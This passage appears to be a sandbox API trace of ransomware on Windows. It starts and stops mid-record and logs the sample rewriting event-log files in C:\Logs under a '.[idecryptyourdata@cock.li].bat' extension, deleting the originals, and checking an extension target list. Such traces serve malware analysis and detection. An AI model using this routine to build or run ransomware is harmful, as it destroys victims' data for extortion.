dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.788] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.788] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.788] GetLastError () returned 0x0 [0068.788] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.790] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.792] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.792] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x16c, lpOverlapped=0x0) returned 1 [0068.792] SetEndOfFile (hFile=0x354) returned 1 [0068.792] CloseHandle (hObject=0x354) returned 1 [0068.792] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.792] SetEndOfFile (hFile=0x2c8) returned 1 [0068.793] CloseHandle (hObject=0x2c8) returned 1 [0068.793] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.793] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 1 [0068.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.794] lstrlenW (lpString=".doc") returned 4 [0068.794] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".docx") returned 5 [0068.794] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.794] lstrlenW (lpString=".pdf") returned 4 [0068.794] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".xls") returned 4 [0068.794] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".xlsx") returned 5 [0068.794] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.794] lstrlenW (lpString=".ppt") returned 4 [0068.794] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.794] lstrlenW (lpString=".zip") returned 4 [0068.794] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".rar") returned 4 [0068.794] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".bz2") returned 4 [0068.794] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString=".7z") returned 3 [0068.794] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.794] lstrlenW (lpString=".dbf") returned 4 [0068.794] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.794] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.794] lstrlenW (lpString=".1cd") returned 4 [0068.794] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".jpg") returned 4 [0068.795] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".doc") returned 4 [0068.795] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".docx") returned 5 [0068.795] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.795] lstrlenW (lpString=".pdf") returned 4 [0068.795] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".xls") returned 4 [0068.795] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".xlsx") returned 5 [0068.795] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.795] lstrlenW (lpString=".ppt") returned 4 [0068.795] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".zip") returned 4 [0068.795] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".rar") returned 4 [0068.795] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".bz2") returned 4 [0068.795] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString=".7z") returned 3 [0068.795] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".dbf") returned 4 [0068.795] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".1cd") returned 4 [0068.795] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.795] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0068.795] lstrlenW (lpString=".jpg") returned 4 [0068.795] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.796] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.796] lstrlenW (lpString="Microsoft-Windows-TWinUI%4Operational.evtx") returned 42 [0068.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.796] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.796] CloseHandle (hObject=0x2c8) returned 1 [0068.796] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 0x20 [0068.796] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.796] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.796] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.796] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.797] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.797] GetLastError () returned 0x0 [0068.797] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.799] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.801] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.801] WriteFile (in: hFile=0x354, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x128, lpOverlapped=0x0) returned 1 [0068.801] SetEndOfFile (hFile=0x354) returned 1 [0068.801] CloseHandle (hObject=0x354) returned 1 [0068.801] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.801] SetEndOfFile (hFile=0x2c8) returned 1 [0068.803] CloseHandle (hObject=0x2c8) returned 1 [0068.803] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.803] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 1 [0068.804] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.804] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.804] lstrlenW (lpString=".doc") returned 4 [0068.804] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".docx") returned 5 [0068.804] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.804] lstrlenW (lpString=".pdf") returned 4 [0068.804] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".xls") returned 4 [0068.804] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".xlsx") returned 5 [0068.804] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.804] lstrlenW (lpString=".ppt") returned 4 [0068.804] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.804] lstrlenW (lpString=".zip") returned 4 [0068.804] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".rar") returned 4 [0068.804] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".bz2") returned 4 [0068.804] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString=".7z") returned 3 [0068.804] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.804] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.804] lstrlenW (lpString=".dbf") returned 4 [0068.804] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.804] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString=".1cd") returned 4 [0068.805] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString=".jpg") returned 4 [0068.805] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString=".doc") returned 4 [0068.805] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".docx") returned 5 [0068.805] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.805] lstrlenW (lpString=".pdf") returned 4 [0068.805] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".xls") returned 4 [0068.805] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".xlsx") returned 5 [0068.805] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.805] lstrlenW (lpString=".ppt") returned 4 [0068.805] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString=".zip") returned 4 [0068.805] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".rar") returned 4 [0068.805] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".bz2") returned 4 [0068.805] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.805] lstrlenW (lpString=".7z") returned 3 [0068.805] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.805] lstrlenW (lpString=".dbf") returned 4 [0068.805] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.806] lstrlenW (lpString=".1cd") returned 4 [0068.806] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 50 [0068.806] lstrlenW (lpString=".jpg") returned 4 [0068.806] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.806] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.806] lstrlenW (lpString="Microsoft-Windows-User Profile Service%4Operational.evtx") returned 56 [0068.806] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.806] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.806] CloseHandle (hObject=0x2c8) returned 1 [0068.806] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 0x20 [0068.806] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.807] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.807] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.807] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.807] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0068.841] GetLastError () returned 0x0 [0068.841] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.843] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.845] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0068.845] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x144, lpOverlapped=0x0) returned 1 [0068.845] SetEndOfFile (hFile=0x394) returned 1 [0068.845] CloseHandle (hObject=0x394) returned 1 [0068.845] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.845] SetEndOfFile (hFile=0x2c8) returned 1 [0068.846] CloseHandle (hObject=0x2c8) returned 1 [0068.846] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.847] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 1 [0068.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.847] lstrlenW (lpString=".doc") returned 4 [0068.847] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".docx") returned 5 [0068.847] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.847] lstrlenW (lpString=".pdf") returned 4 [0068.847] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".xls") returned 4 [0068.847] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".xlsx") returned 5 [0068.847] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.847] lstrlenW (lpString=".ppt") returned 4 [0068.847] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.847] lstrlenW (lpString=".zip") returned 4 [0068.847] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".rar") returned 4 [0068.847] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".bz2") returned 4 [0068.847] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.847] lstrlenW (lpString=".7z") returned 3 [0068.847] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString=".dbf") returned 4 [0068.848] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString=".1cd") returned 4 [0068.848] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString=".jpg") returned 4 [0068.848] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString=".doc") returned 4 [0068.848] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".docx") returned 5 [0068.848] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.848] lstrlenW (lpString=".pdf") returned 4 [0068.848] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".xls") returned 4 [0068.848] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".xlsx") returned 5 [0068.848] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.848] lstrlenW (lpString=".ppt") returned 4 [0068.848] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.848] lstrlenW (lpString=".zip") returned 4 [0068.848] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".rar") returned 4 [0068.848] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".bz2") returned 4 [0068.848] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.848] lstrlenW (lpString=".7z") returned 3 [0068.849] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.849] lstrlenW (lpString=".dbf") returned 4 [0068.849] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.849] lstrlenW (lpString=".1cd") returned 4 [0068.849] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 64 [0068.849] lstrlenW (lpString=".jpg") returned 4 [0068.849] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.849] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.849] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4Operational.evtx") returned 52 [0068.849] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.849] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0068.849] CloseHandle (hObject=0x2c8) returned 1 [0068.849] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 0x20 [0068.849] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0068.850] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.850] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0068.850] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0068.850] GetLastError () returned 0x0 [0068.850] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.852] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.855] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: 